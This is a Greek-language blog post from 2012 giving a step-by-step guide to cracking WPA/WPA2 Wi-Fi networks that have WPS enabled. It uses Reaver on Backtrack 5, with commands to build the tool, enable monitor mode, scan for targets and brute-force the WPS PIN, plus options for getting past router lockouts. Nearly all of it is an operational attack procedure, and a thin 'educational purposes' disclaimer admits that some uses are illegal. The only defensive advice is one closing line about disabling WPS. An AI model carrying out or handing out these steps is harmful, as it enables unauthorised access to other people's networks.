ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Πέμπτη, 19 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα δικτυο WPA/WPA2 με WPS

Τι θα χρειαστεις;

1.Backtrack 5 R1
2.Reaver
3.WPA/WPA2 δικτυο με Wifi Protected Setup


  • Παταμε εδω και κατεβαζουμε το Reaver
  • μετα αφου το αρχειο reaver-1-3.tar.gz  εχει κατεβει και ειναι στον φακελο root ανοιγουμε ενα τερματικο και γραφουμε
  • tar zxvf reaver-1-3.tar.gz
  • μετα cd reaver-1-3
  • cd src
  • ./configure
  • make
  • make install
  • και ειμαστε ετοιμοι να αρχισουμε (αποσυνδεουμε το δικτυο μας)
  • airmon-ng start wlan0
  • walsh -i mon0 -C
  • βλεπουμε ποιο δικτυο εχει WPS σημειωνουμε την mac address , παταμε ctrl+c  και παμε με το reaver για να το σπασουμε
  • γραφουμε  reaver -i mon0 -b 00:24:40:48:99:99 -vv
  • οπου 
  • -b την mac address του δικτυου που θελουμε να σπασουμε 
  • -vv βαζουμε για να μας δειχνει λεπτομερως τι γινετε
  • αν γραψετε μονο reaver θας σας εμφανισει ολες τις επιλογες που μπορειτε να εφαρμοσετε
  • περιμενουμε και μας εμφανιζει τον κωδικο
  • αν θελετε μπορειτε να πατησετε ctrl+c και να συνεχισετε οποτε εσεις θελετε γιατι σε μερικα ρουτερ κραταει ωρες πχ οταν δοκιμαζει το reaver τους κωδικους, το ρουτερ μετα απο καποιες προσπαθειες κλειδωνει και μετα απο 5 λεπτα δεχετε αλλες προσπαθειες για κωδικους
  • Επιπλεον επιλογες του reaver που θα σας φανουν χρησιμες
  • -a βρισκει αυτοματα τις καλυτερες ρυθμισεις σπασιματος για το δικτυο
  • - l βαλτε ποσος χρονος θα ειναι η αναμονη για να ξαναπροσπαθησει το σπασιμο πχ. -l 630 * οταν σας λεει Warning AP detected limited time retrying .....εφαρμοζετε αυτη την επιλογη συνηθως πανω απο 315 δευτερα βαζετε.
  • -r βαζετε τον χρονο αναμονης στις  ποσες προσπαθειες δλδ -r 315:4 θα κανει 4 προσπαθειες και μετα θα περιμενει πεντε λεπτα και 15 δευτερα μεχρι να ξαναρχισει
  •  -t βαζετε τον χρονο αναμονης ληψης αναμεσα απο καθε προσπαθεια σπασιματος ( pin attemps) δλδ κανετε μια προσπαθεια και περιμενετε αποτελεσμα αυτο τον χρονο ρυθμιζετε οταν σας λεει waarning receive timeout occur συνηθως το αλλαζετε σε μεγαλυτερο
  • -L αγνοειτε το κλειδωμα του ρουτερ και τον χρονο αναμονης που πρεπει να περιμενετε.
  • -S στελνετε μικροτερα πακετα και επιταχυνει το χρονο του σπασιματος
  • τις επιλογες πρεπει να τις βαλετε μετα το -vv  δλδ
  • reaver -i mon0 -b <mac_address> -vv -a -l 630 -r 630:4 -t 5 -L -S κτλ..... 
  • Με αυτη την επιθεση του reaver δεν χρειαζετε να ειναι συνδεδεμενος κανενας χρηστης ουτε χρειαζονται λεξικα για να σπασει το δικτυο επισεις μπορειτε να συνεχισετε οποτε θελετε απο εκει που ειχατε μεινει.

 Πως να προστατευτειτε;

1.Απενεργοποιηστε το WPS στο ρουτερ σας

Δεν υπάρχουν σχόλια: